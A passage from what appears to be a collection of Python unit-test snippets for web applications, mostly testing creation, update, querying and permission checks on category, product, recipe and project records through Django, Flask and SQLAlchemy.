'categories', 'onecat')\n self.submit200()\n minus = MinusRecord.objects.all()[0]\n self.assert_equal(minus.categories.count(), 1)\n self.go200('minus_edit', [self.superuser, minus.id])\n self.fv('minus_upload', 'add_category', 'yuppie')\n self.submit200()\n self.assert_equal(minus.categories.count(), 2)\n self.assert_equal(minus.categories.all()[0].name, 'onecat')\n self.assert_equal(minus.categories.all()[1].name, 'yuppie')", "def test_update_category(self):\n self.update_success(self.test_data['pants'], self.test_data['shirts'])", "def test_new_category_is_added(db_session):\n new_cat = Category(\n label=\"test_label\",\n desc=\"test_desc\"\n )\n db_session.add(new_cat)\n query = db_session.query(Category).all()\n assert len(query) == 1", "def test_products_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data, Product))\n self.assertEqual(str(data), 'django beginners')", "def test_products_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data, Recipe))\n self.assertEqual(str(data), 'django beginners')", "def test_Categories_getter(self):\r\n expected = ['Treatment', 'DOB']\r\n observed = self.cs_overview.Categories\r\n self.assertEqual(observed, expected)", "def create_category():\n category = Category(name='testcategory', description=\"\", fee=DEFAULT_FEE)\n category.save()\n return category", "def test_category_manip_pipeline(self):\n raise NotImplementedError(\"\")", "def test_update_category(self):\n category = sample_category()\n url = category_details_url(category.id)\n self.client.put(url, {\"name\": \"school\"})\n category.refresh_from_db()\n self.assertEqual(category.name, 'school')", "def test_query_category(self):\r\n CategoryFactory.create(name='thinking', short_name='thinking')\r\n # Test for real field\r\n url = \"/api/category\"\r\n res = self.app.get(url + \"?short_name=thinking\")\r\n data = json.loads(res.data)\r\n # Should return one result\r\n assert len(data) == 1, data\r\n # Correct result\r\n assert data[0]['short_name'] == 'thinking', data\r\n\r\n # Valid field but wrong value\r\n res = self.app.get(url + \"?short_name=wrongvalue\")\r\n data = json.loads(res.data)\r\n assert len(data) == 0, data\r\n\r\n # Multiple fields\r\n res = self.app.get(url + '?short_name=thinking&name=thinking')\r\n data = json.loads(res.data)\r\n # One result\r\n assert len(data) == 1, data\r\n # Correct result\r\n assert data[0]['short_name'] == 'thinking', data\r\n assert data[0]['name'] == 'thinking', data\r\n\r\n # Limits\r\n res = self.app.get(url + \"?limit=1\")\r\n data = json.loads(res.data)\r\n for item in data:\r\n assert item['short_name'] == 'thinking', item\r\n assert len(data) == 1, data\r\n\r\n # Errors\r\n res = self.app.get(url + \"?something\")\r\n err = json.loads(res.data)\r\n err_msg = \"AttributeError exception should be raised\"\r\n res.status_code == 415, err_msg\r\n assert res.status_code == 415, err_msg\r\n assert err['action'] == 'GET', err_msg\r\n assert err['status'] == 'failed', err_msg\r\n assert err['exception_cls'] == 'AttributeError', err_msg", "def test_put_category(self):\n self.assertEqual(Project.objects.count(), 2)\n\n url = reverse(\n 'projectroles:api_project_update',\n kwargs={'project': self.category.sodar_uuid},\n )\n put_data = {\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': '',\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n }\n response = self.request_knox(url, method='PUT', data=put_data)\n\n self.assertEqual(response.status_code, 200, msg=response.content)\n self.assertEqual(Project.objects.count(), 2)\n\n self.category.refresh_from_db()\n model_dict = model_to_dict(self.category)\n model_dict['readme'] = model_dict['readme'].raw\n expected = {\n 'id': self.category.pk,\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n 'archive': False,\n 'full_title': UPDATED_TITLE,\n 'has_public_children': False,\n 'sodar_uuid': self.category.sodar_uuid,\n }\n self.assertEqual(model_dict, expected)\n\n expected = {\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.category.get_owner().sodar_uuid): {\n 'role': PROJECT_ROLE_OWNER,\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'inherited': False,\n 'sodar_uuid': str(self.category.get_owner().sodar_uuid),\n }\n },\n 'sodar_uuid': str(self.category.sodar_uuid),\n }\n self.assertEqual(json.loads(response.content), expected)", "def test_add_category_success(self):\n category = json.dumps({\n 'name': 'Asian',\n })\n response = self.client.post('/category', data=category,\n headers={\"Authorization\": self.token})\n self.assertEqual(response.status_code, 201)\n self.assertIn('asian', response.data.decode())", "def test_get_categories(self):\n pass", "def test_create_category(self):\n self.assertEqual(Project.objects.count(), 2)\n\n url = reverse('projectroles:api_project_create')\n post_data = {\n 'title': NEW_CATEGORY_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': '',\n 'description': 'description',\n 'readme': 'readme',\n 'public_guest_access': False,\n 'owner': str(self.user.sodar_uuid),\n }\n response = self.request_knox(url, method='POST', data=post_data)\n\n self.assertEqual(response.status_code, 201, msg=response.content)\n self.assertEqual(Project.objects.count(), 3)\n # Assert object content\n new_category = Project.objects.get(title=NEW_CATEGORY_TITLE)\n model_dict = model_to_dict(new_category)\n model_dict['readme'] = model_dict['readme'].raw\n expected = {\n 'id': new_category.pk,\n 'title': new_category.title,\n 'type': new_category.type,\n 'parent': None,\n 'description': new_category.description,\n 'readme': new_category.readme.raw,\n 'public_guest_access': False,\n 'archive': False,\n 'full_title': new_category.title,\n 'has_public_children': False,\n 'sodar_uuid': new_category.sodar_uuid,\n }\n self.assertEqual(model_dict, expected)\n # Assert role assignment\n self.assertEqual(\n RoleAssignment.objects.filter(\n project=new_category, user=self.user, role=self.role_owner\n ).count(),\n 1,\n )\n # Assert API response\n expected = {\n 'title': NEW_CATEGORY_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': new_category.description,\n 'readme': new_category.readme.raw,\n 'public_guest_access': False,\n 'sodar_uuid': str(new_category.sodar_uuid),\n }\n self.assertEqual(json.loads(response.content), expected)", "def setUpTestData(cls):\n Product_type.objects.create(\n name='New_Product', display_name='New Product.')", "def sample_category(name='place'):\n return Category.objects.create(name=name)", "def test_products_basic(self):\n self.assertEqual(self.cat1.name, 'meat')\n self.assertEqual(self.cat1.slug, 'meat')\n self.assertEqual(self.cat1.description, 'The meat category.')\n self.assertIsNone(self.cat1.parent)\n\n self.assertEqual(len(self.product1.categories.all()), 1)\n self.assertEqual(self.product1.categories.all()[0], self.cat1)\n self.assertEqual(self.product1.name, 'Chicken Breast')\n self.assertEqual(self.product1.slug, 'chicken-breast')\n self.assertIn('product1_img', self.product1.main_image.image.name)\n self.assertEqual(self.product1.description, \n 'Chicken breast. Yes, chicken breast.')\n self.assertEqual(self.product1.stock, 120)\n self.assertTrue(self.product1.available)\n\n self.assertEqual(self.product1.main_image_url, \n self.product1.main_image.image.url,\n '\\'main_image_url\\' shorthand in Product model did not match the ' \n 'actual main image url')\n \n # Test adding multiple categories to a product \n high_protein = self.product1.categories.create(name='high protein',\n slug='high-protein',\n description='Hight protein foods.',\n parent=self.cat1)\n\n self.assertEqual(len(self.product1.categories.all()), 2)\n self.assertIn(high_protein, self.product1.categories.all())\n self.assertEqual(high_protein.parent, self.cat1)\n\n # Test __str()__ returns expected name\n self.assertEqual(str(self.product1), 'Chicken Breast')\n self.assertEqual(str(self.cat1), 'meat')\n\n # Make sure the urls are returned correctly\n self.assertEqual(self.product1.get_absolute_url(), \n reverse('products:product_detail', \n kwargs= {'slug': self.product1.slug}))", "def test_retrieve_categories(self):\n sample_category()\n sample_category(name=\"people\")\n res = self.client.get(CATEGORY_URL)\n categories = Category.objects.all()\n serializer = CategorySerializer(categories, many=True)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(len(res.data), len(serializer.data))\n self.assertEqual(res.data, serializer.data)", "def test_new_attribute_data(db_session):\n new_att = Attribute(\n label=\"test_label\",\n desc=\"test_desc\"\n )\n db_session.add(new_att)\n att = db_session.query(Attribute).all()\n assert att[0].label == \"test_label\"\n assert att[0].desc == \"test_desc\"", "def test_categories_add(self):\n categories = [category.category for category in self.note.categories.all()]\n self.assertIn('test', categories)\n self.assertNotIn('note', categories)", "def test_category_field(self):\n field = self.record.find('field[@name=\\'category_id\\']')\n self.assertEqual(field.attrib['eval'],\n '[(4, ref(\\'nh_clinical.role_nhc_admin\\'))]',\n 'Incorrect eval on category id')", "def test_delete_category(self):\n pass", "def test_save(self, init_db, category1):\n params = {\n 'title' : fake.alphanumeric(15),\n 'description' : fake.alphanumeric(200),\n 'ranking' : 1,\n 'meta_data' : {\n 'color' : 'red',\n 'quantity' : 2,\n 'date_purchased' : '2019-02-05',\n 'condition' : 'bad'\n },\n 'category_id' : category1.id\n }\n\n favorite = Favorite(**params)\n assert favorite == favorite.save()", "def test_edit_category(self):\n rv = self.client().post(\n '/categories/',\n data={'category_name': 'Sauces'})\n self.assertEqual(rv.status_code, 201)\n rv = self.client().put(\n '/categories/1',\n data={\n \"name\": \"Soups and Sauces\"\n })\n #self.assertEqual(rv.status_code, 200)\n results = self.client().get('/categories/1')\n #self.assertIn('Soups and', str(results.data))", "def test_create_category_nested(self):\n self.assertEqual(Project.objects.count(), 2)\n\n url = reverse('projectroles:api_project_create')\n post_data = {\n 'title': NEW_CATEGORY_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': str(self.category.sodar_uuid),\n 'description': 'description',\n 'readme': 'readme',\n 'public_guest_access': False,\n 'owner': str(self.user.sodar_uuid),\n }\n response = self.request_knox(url, method='POST', data=post_data)\n\n self.assertEqual(response.status_code, 201, msg=response.content)\n self.assertEqual(Project.objects.count(), 3)\n new_category = Project.objects.get(title=NEW_CATEGORY_TITLE)\n model_dict = model_to_dict(new_category)\n model_dict['readme'] = model_dict['readme'].raw\n expected = {\n 'id': new_category.pk,\n 'title': new_category.title,\n 'type': new_category.type,\n 'parent': self.category.pk,\n 'description': new_category.description,\n 'readme': new_category.readme.raw,\n 'public_guest_access': False,\n 'archive': False,\n 'full_title': self.category.title + ' / ' + new_category.title,\n 'has_public_children': False,\n 'sodar_uuid': new_category.sodar_uuid,\n }\n self.assertEqual(model_dict, expected)\n self.assertEqual(\n RoleAssignment.objects.filter(\n project=new_category, user=self.user, role=self.role_owner\n ).count(),\n 1,\n )\n expected = {\n 'title': NEW_CATEGORY_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': str(self.category.sodar_uuid),\n 'description': new_category.description,\n 'readme': new_category.readme.raw,\n 'public_guest_access': False,\n 'sodar_uuid': str(new_category.sodar_uuid),\n }\n self.assertEqual(json.loads(response.content), expected)", "def test_create_product_successful(self):\n \n ProductCategory.objects.create(name=\"test name\", description=\"new name\")\n test_key = ProductCategory.objects.values()[0]\n # print(test_key)\n payload = {\n 'name': 'Test Tag',\n 'product_category_id': test_key.get('id'),\n 'unit_price': 100,\n 'quantity': 12,\n 'description': 'Test description'\n }\n \n res = self.client.post(PRODUCT_ADD_URL, payload)\n\n # print(res.data)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)", "def test_23_admin_add_category(self):\r\n self.create()\r\n category = {'name': 'cat', 'short_name': 'cat',\r\n 'description': 'description'}\r\n # Anonymous user\r\n url = '/admin/categories'\r\n res = self.app.post(url, data=category, follow_redirects=True)\r\n dom = BeautifulSoup(res.data)\r\n err_msg = \"Anonymous users should be redirected to sign in\"\r\n assert dom.find(id='signin') is not None, err_msg\r\n\r\n # Authenticated user but not admin\r\n self.signin(email=self.email_addr2, password=self.password)\r\n res = self.app.post(url, data=category, follow_redirects=True)\r\n err_msg = \"Non-Admin users should get 403\"\r\n assert res.status_code == 403, err_msg\r\n self.signout()\r\n\r\n # Admin\r\n self.signin(email=self.root_addr, password=self.root_password)\r\n res = self.app.post(url, data=category, follow_redirects=True)\r\n err_msg = \"Category should be added\"\r\n assert \"Category added\" in res.data, err_msg\r\n assert category['name'] in res.data, err_msg\r\n\r\n category = {'name': 'cat', 'short_name': 'cat',\r\n 'description': 'description'}\r\n\r\n self.signin(email=self.root_addr, password=self.root_password)\r\n res = self.app.post(url, data=category, follow_redirects=True)\r\n err_msg = \"Category form validation should work\"\r\n assert \"Please correct the errors\" in res.data, err_msg", "def test_valid_form(self):\n\n data = {'category': ['103','109'] }\n form = CategoriesForm(data=data)\n self.assertTrue(form.is_valid())", "def test_photo_classification_view_set_post_category_update_not_allowed(self):\n # Test data\n user = account_models.User.objects.get(email='mrtest@mypapaya.io')\n photo_models.PhotoClassification.objects.create_or_update(name='night', classification_type='category')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'category'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n\n self.assertEquals(request.status_code, 400)\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 12)", "def test_edit_category(self):\n response = self.client.put('/api/v1/category/1',\n data=json.dumps(category[3]),\n content_type='application/json',\n headers=self.admin_headers)\n self.assertEqual(response.status_code, 201)\n self.assertIn('Apparels', str(response.data))", "def test_add_category_integer_name(self):\n category = json.dumps({\n 'name': 8888,\n })\n response = self.client.post('/category', data=category,\n headers={\"Authorization\": self.token})\n self.assertEqual(response.status_code, 400)\n self.assertIn('Numbers cant be a Name', response.data.decode())", "def test_add_category_to_product(self):\n login = self.autheniticate()\n token = json.loads(login.data.decode()).get('token')\n self.app.post(product_url,\n data=json.dumps(self.product_data),\n headers=dict(Authorization=\"Bearer \" + token),\n content_type='application/json')\n self.app.post(category_url,\n data=json.dumps(self.data),\n headers=dict(Authorization=\"Bearer \" + token),\n content_type='application/json')\n res = self.app.post(productcategory_url,\n headers=dict(Authorization=\"Bearer \" + token),\n content_type='application/json')\n res1 = json.loads(res.data.decode())\n self.assertEqual(res1['status'], 'Updated!')\n self.assertEqual(res.status_code, 200)", "def test_category_url(self):\n data = self.data1\n # response = self.client.post(\n # reverse('recipe:category_list', args=[data.slug]))\n # self.assertEqual(response.status_code, 200)\n self.assertTrue(isinstance(data, Category))", "def fill_in(self,category):\r\n api_json = JsonFromApi(category)\r\n extracted_data = ExtractFromJson(api_json.get_json())\r\n self.fill_in_db = DatabaseUpdator(\r\n extracted_data.extract_json(), self.mydb)\r\n self.fill_in_db.table_product_update()\r\n self.fill_in_db.table_category_update()", "def test_books_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data,Books))", "def test_category(self, category):\n\n importable = False\n try:\n Categories.objects.get(\n name=category['id'].split(':')[1]\n )\n except Categories.DoesNotExist:\n importable = True\n except:\n importable = False\n\n return importable", "def test_project_category_creation(self):\n name = 'A project category name'\n description = 'A project category description'\n project_category = self.create_project_category(\n name=name,\n description=description,\n )\n self.assertTrue(isinstance(project_category, ProjectCategory))\n self.assertEqual(project_category.__str__(), project_category.name)\n self.assertEqual(project_category.name, name)\n self.assertEqual(project_category.description, description)", "def test_get_category_details(self):\n category = sample_category()\n url = category_details_url(category.id)\n res = self.client.get(url)\n serializer = CategorySerializer(category)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)", "def test_add_missing_field(self):\n response = self.client.post('/api/v1/categories',\n data=json.dumps(category[1]),\n content_type='application/json',\n headers=self.admin_headers)\n self.assertEqual(response.status_code, 400)\n self.assertIn('Missing required parameter', str(response.data))", "def test_photo_classification_view_set_post_tag_category_exists(self):\n # Test data\n user = account_models.User.objects.get(email='mrtest@mypapaya.io')\n photo_models.PhotoClassification.objects.create_or_update(name='night', classification_type='category')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n self.assertEquals(result['classification_type'], 'tag')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 13)", "def test_view_categories(self):\n res = self.client().post('/categories/', data=self.category)\n self.assertEqual(res.status_code, 201)\n res = self.client().get('/categories/')\n self.assertEqual(res.status_code, 200)\n self.assertIn('Stews', str(res.data))", "def test_create_drug_successful(self):\n generic = models.Generic.objects.create(\n generic_name=\"Lisinopril\"\n )\n print(type(generic))\n drug = models.Drug.objects.create(\n product_id='12345',\n generic_name=generic,\n product_ndc=\"99999-9999\",\n brand_name=\"Zestril\"\n )\n\n self.assertEqual(str(drug), f\"{drug.product_id} {drug.product_ndc}\")", "def test_create(self):\n self.assertEqual(Product.objects.count(), 2)\n payload = {\n 'name': 'New product',\n 'category': self.category_1.id,\n 'sku': '11111111',\n 'description': 'New product description',\n 'price': 39.99\n }\n\n headers = {\n 'HTTP_AUTHORIZATION': 'Token ' + str(self.token_admin)\n }\n response = self.client.post(\n '/api/products/', data=payload, content_type='application/json', **headers)\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response['Content-Type'], 'application/json')\n self.assertEqual(Product.objects.count(), 3)\n\n product = Product.objects.get(name='New product')\n self.assertEqual(product.name, 'New product')\n self.assertEqual(product.category, self.category_1)\n self.assertEqual(product.sku, '11111111')\n self.assertEqual(product.description, 'New product description')\n self.assertEqual(float(product.price), 39.99)", "def test_up_assign_categories(self):\n self.go200('minus_upload')\n self.formfile('minus_upload', 'file', AUDIO_FILE)\n self.fv('minus_upload', 'categories', 'onecat')\n self.submit200()\n minus = MinusRecord.objects.all()[0]\n self.url('minus_detail', [minus.author, minus.id])\n self.assert_equal(minus.categories.count(), 1)\n self.assert_equal(minus.categories.all()[0].name, 'onecat')", "def test_get_category_forms(self):\n self.get_add_form()\n self.get_edit_form(self.test_data['pants'])\n self.get_delete_confirmation_form(self.test_data['shirts'])", "def test_can_create_job_category(self):\n\t\tself.job_category.save()\n\t\tjob_category_instance = JobCategory.objects.get(pk=1)\n\t\tself.assertEqual(\n\t\t\tself.category,\n\t\t\tjob_category_instance.category,\n\t\t\t\"Job categories don't match.\"\n\t\t)", "def test_prep_new_data(self):\n pass", "def test_recipe_model(self):\n recipe = Recipe(uri=\"testuri\", name=\"testname\", image_url=\"test_image_url\")\n\n db.session.add(recipe)\n db.session.commit()\n\n recipes = Recipe.query.all()\n\n self.assertEqual(len(recipes), 1)\n self.assertEqual(recipes[0].uri, \"testuri\")\n self.assertEqual(recipes[0].name, \"testname\")\n self.assertEqual(recipes[0].image_url, \"test_image_url\")", "def test_category_post(self):\r\n admin = UserFactory.create()\r\n user = UserFactory.create()\r\n name = u'Category'\r\n category = dict(\r\n name=name,\r\n short_name='category',\r\n description=u'description')\r\n data = json.dumps(category)\r\n # no api-key\r\n url = '/api/category'\r\n res = self.app.post(url, data=data)\r\n err = json.loads(res.data)\r\n err_msg = 'Should not be allowed to create'\r\n assert res.status_code == 401, err_msg\r\n assert err['action'] == 'POST', err_msg\r\n assert err['exception_cls'] == 'Unauthorized', err_msg\r\n\r\n # now a real user but not admin\r\n res = self.app.post(url + '?api_key=' + user.api_key, data=data)\r\n err = json.loads(res.data)\r\n err_msg = 'Should not be allowed to create'\r\n assert res.status_code == 403, err_msg\r\n assert err['action'] == 'POST', err_msg\r\n assert err['exception_cls'] == 'Forbidden', err_msg\r\n\r\n # now as an admin\r\n res = self.app.post(url + '?api_key=' + admin.api_key,\r\n data=data)\r\n err = json.loads(res.data)\r\n err_msg = 'Admin should be able to create a Category'\r\n assert res.status_code == 200, err_msg\r\n cat = db.session.query(Category)\\\r\n .filter_by(short_name=category['short_name']).first()\r\n assert err['id'] == cat.id, err_msg\r\n assert err['name'] == category['name'], err_msg\r\n assert err['short_name'] == category['short_name'], err_msg\r\n assert err['description'] == category['description'], err_msg\r\n\r\n # test re-create should fail\r\n res = self.app.post(url + '?api_key=' + admin.api_key,\r\n data=data)\r\n err = json.loads(res.data)\r\n assert res.status_code == 415, err\r\n assert err['status'] == 'failed', err\r\n assert err['action'] == 'POST', err\r\n assert err['exception_cls'] == \"IntegrityError\", err\r\n\r\n # test create with non-allowed fields should fail\r\n data = dict(name='fail', short_name='fail', wrong=15)\r\n res = self.app.post(url + '?api_key=' + admin.api_key,\r\n data=data)\r\n err = json.loads(res.data)\r\n err_msg = \"ValueError exception should be raised\"\r\n assert res.status_code == 415, err\r\n assert err['action'] == 'POST', err\r\n assert err['status'] == 'failed', err\r\n assert err['exception_cls'] == \"ValueError\", err_msg\r\n # Now with a JSON object but not valid\r\n data = json.dumps(data)\r\n res = self.app.post(url + '?api_key=' + user.api_key,\r\n data=data)\r\n err = json.loads(res.data)\r\n err_msg = \"TypeError exception should be raised\"\r\n assert err['action'] == 'POST', err_msg\r\n assert err['status'] == 'failed', err_msg\r\n assert err['exception_cls'] == \"TypeError\", err_msg\r\n assert res.status_code == 415, err_msg\r\n\r\n # test update\r\n data = {'name': 'My New Title'}\r\n datajson = json.dumps(data)\r\n ## anonymous\r\n res = self.app.put(url + '/%s' % cat.id,\r\n data=data)\r\n error_msg = 'Anonymous should not be allowed to update'\r\n assert_equal(res.status, '401 UNAUTHORIZED', error_msg)\r\n error = json.loads(res.data)\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'PUT', error\r\n assert error['exception_cls'] == 'Unauthorized', error\r\n\r\n ### real user but not allowed as not admin!\r\n url = '/api/category/%s?api_key=%s' % (cat.id, user.api_key)\r\n res = self.app.put(url, data=datajson)\r\n error_msg = 'Should not be able to update apps of others'\r\n assert_equal(res.status, '403 FORBIDDEN', error_msg)\r\n error = json.loads(res.data)\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'PUT', error\r\n assert error['exception_cls'] == 'Forbidden', error\r\n\r\n # Now as an admin\r\n res = self.app.put('/api/category/%s?api_key=%s' % (cat.id, admin.api_key),\r\n data=datajson)\r\n assert_equal(res.status, '200 OK', res.data)\r\n out2 = db.session.query(Category).get(cat.id)\r\n assert_equal(out2.name, data['name'])\r\n out = json.loads(res.data)\r\n assert out.get('status') is None, error\r\n assert out.get('id') == cat.id, error\r\n\r\n # With fake data\r\n data['algo'] = 13\r\n datajson = json.dumps(data)\r\n res = self.app.put('/api/category/%s?api_key=%s' % (cat.id, admin.api_key),\r\n data=datajson)\r\n err = json.loads(res.data)\r\n assert res.status_code == 415, err\r\n assert err['status'] == 'failed', err\r\n assert err['action'] == 'PUT', err\r\n assert err['exception_cls'] == 'TypeError', err\r\n\r\n # With not JSON data\r\n datajson = data\r\n res = self.app.put('/api/category/%s?api_key=%s' % (cat.id, admin.api_key),\r\n data=datajson)\r\n err = json.loads(res.data)\r\n assert res.status_code == 415, err\r\n assert err['status'] == 'failed', err\r\n assert err['action'] == 'PUT', err\r\n assert err['exception_cls'] == 'ValueError', err\r\n\r\n # With wrong args in the URL\r\n data = dict(\r\n name='Category3',\r\n short_name='category3',\r\n description=u'description3')\r\n\r\n datajson = json.dumps(data)\r\n res = self.app.put('/api/category/%s?api_key=%s&search=select1' % (cat.id, admin.api_key),\r\n data=datajson)\r\n err = json.loads(res.data)\r\n assert res.status_code == 415, err\r\n assert err['status'] == 'failed', err\r\n assert err['action'] == 'PUT', err\r\n assert err['exception_cls'] == 'AttributeError', err\r\n\r\n # test delete\r\n ## anonymous\r\n res = self.app.delete(url + '/%s' % cat.id, data=data)\r\n error_msg = 'Anonymous should not be allowed to delete'\r\n assert_equal(res.status, '401 UNAUTHORIZED', error_msg)\r\n error = json.loads(res.data)\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'DELETE', error\r\n assert error['target'] == 'category', error\r\n ### real user but not admin\r\n url = '/api/category/%s?api_key=%s' % (cat.id, user.api_key)\r\n res = self.app.delete(url, data=datajson)\r\n error_msg = 'Should not be able to delete apps of others'\r\n assert_equal(res.status, '403 FORBIDDEN', error_msg)\r\n error = json.loads(res.data)\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'DELETE', error\r\n assert error['target'] == 'category', error\r\n\r\n # As admin\r\n url = '/api/category/%s?api_key=%s' % (cat.id, admin.api_key)\r\n res = self.app.delete(url, data=datajson)\r\n\r\n assert_equal(res.status, '204 NO CONTENT', res.data)\r\n\r\n # delete a category that does not exist\r\n url = '/api/category/5000?api_key=%s' % admin.api_key\r\n res = self.app.delete(url, data=datajson)\r\n error = json.loads(res.data)\r\n assert res.status_code == 404, error\r\n assert error['status'] == 'failed', error\r\n assert error['action'] == 'DELETE', error\r\n assert error['target'] == 'category', error\r\n assert error['exception_cls'] == 'NotFound', error\r\n\r\n # delete a category that does not exist\r\n url = '/api/category/?api_key=%s' % admin.api_key\r\n res = self.app.delete(url, data=datajson)\r\n assert res.status_code == 404, error", "def test_category_addition(self):\n login = self.autheniticate()\n token = json.loads(login.data.decode()).get('token')\n res = self.app.post(category_url,\n data=json.dumps(self.data),\n headers=dict(Authorization=\"Bearer \" + token),\n content_type='application/json')\n res1 = json.loads(res.data.decode())\n self.assertEqual(res1['status'], 'Success!')\n self.assertEqual(res.status_code, 201)", "def test_patch_category(self):\n self.assertEqual(Project.objects.count(), 2)\n\n url = reverse(\n 'projectroles:api_project_update',\n kwargs={'project': self.category.sodar_uuid},\n )\n patch_data = {\n 'title': UPDATED_TITLE,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n }\n response = self.request_knox(url, method='PATCH', data=patch_data)\n\n self.assertEqual(response.status_code, 200, msg=response.content)\n self.assertEqual(Project.objects.count(), 2)\n\n self.category.refresh_from_db()\n model_dict = model_to_dict(self.category)\n model_dict['readme'] = model_dict['readme'].raw\n expected = {\n 'id': self.category.pk,\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n 'archive': False,\n 'full_title': UPDATED_TITLE,\n 'has_public_children': False,\n 'sodar_uuid': self.category.sodar_uuid,\n }\n self.assertEqual(model_dict, expected)\n self.assertEqual(self.category.get_owner().user, self.user_owner_cat)\n\n expected = {\n 'title': UPDATED_TITLE,\n 'type': PROJECT_TYPE_CATEGORY,\n 'parent': None,\n 'description': UPDATED_DESC,\n 'readme': UPDATED_README,\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.category.get_owner().sodar_uuid): {\n 'role': PROJECT_ROLE_OWNER,\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'inherited': False,\n 'sodar_uuid': str(self.category.get_owner().sodar_uuid),\n }\n },\n 'sodar_uuid': str(self.category.sodar_uuid),\n }\n self.assertEqual(json.loads(response.content), expected)", "def test_cat_says(self):\n cat = models.Cat(name='Garfield')\n self.assertEqual(cat.says(), 'meow')", "def test_create_new_recipe(self):\n payload = {\n 'title': 'Cheescake',\n 'time_taken': 35,\n 'price': 5\n }\n\n res = self.client.post(RECIPE_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n recipe = Recipe.objects.get(id=res.data['id'])\n for key in payload.keys():\n self.assertEqual((payload)[key], getattr(recipe, key))\n\n # recipe = get_sample_recipe(self.sample_user)\n # db_recipe =\n\n # self.assertEqual(recipe.title, )", "def test_create_category_with_existing_name(self):\n sample_category()\n res = self.client.post(CATEGORY_URL, {\"name\": \"place\"})\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(\n res.data['errors']['name'][0],\n 'This field must be unique.')", "def add_categorization(item_uuid, category_name, category_type):\n try:\n record_to_insert = (item_uuid, category_name, category_type)\n cursor = db.get_cursor()\n cursor.execute('INSERT INTO categorization VALUES (%s, %s, %s);', record_to_insert)\n db.get_db().commit()\n\n return {'row_count': cursor.rowcount, 'status': 'Record inserted successfuly into categorization table', 'error': ''}\n except (Exception, psycopg2.Error) as error:\n return {'row_count': 0, \"status\": \"error\", \"error\": error}", "def test_add_relation_type(self):\n pass", "def test_create_post(self):\n self.test_category = Category.objects.create(name='django')\n self.testuser1 = User.objects.create_superuser(\n username='test_user1', password='123456789')\n # self.testuser1.is_staff = True\n\n self.client.login(username=self.testuser1.username,\n password='123456789')\n\n data = {\"title\": \"new\", \"author\": 1,\n \"excerpt\": \"new\", \"content\": \"new\"}\n url = reverse('blog_api:listcreate')\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)", "def setUp(self):\n db.drop_all()\n db.create_all()\n\n self.uid = 1000\n # create category \n cat = Category.retrieve_or_add('Business')\n self.cat = cat\n # create user \n u = User.signup('testuser', 'test@test.com', 'password', cat.id)\n u.id = self.uid\n db.session.commit()\n\n self.u = User.query.get(self.uid)", "def test_photo_classification_view_set_post_category_not_allowed(self):\n # Test data\n user = account_models.User.objects.get(email='mrtest@mypapaya.io')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'category'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n\n self.assertEquals(request.status_code, 400)\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 11)", "def setUp(self):\n fun = Category(name=\"funny\")\n fun.save()\n lagos = Location(name=\"Lagos\")\n lagos.save()\n self.new_image = Pics(\n name=\"image\", description=\"h\", location=lagos, category=fun)", "def categories(data):\n if data:\n for i in data:\n category = CategoriesModel(categories=i['categories'])\n category.save()", "def test_product_fields(self):\n\n prd = Product.objects.get(id=1)\n\n # test the type of name field\n prd_type = 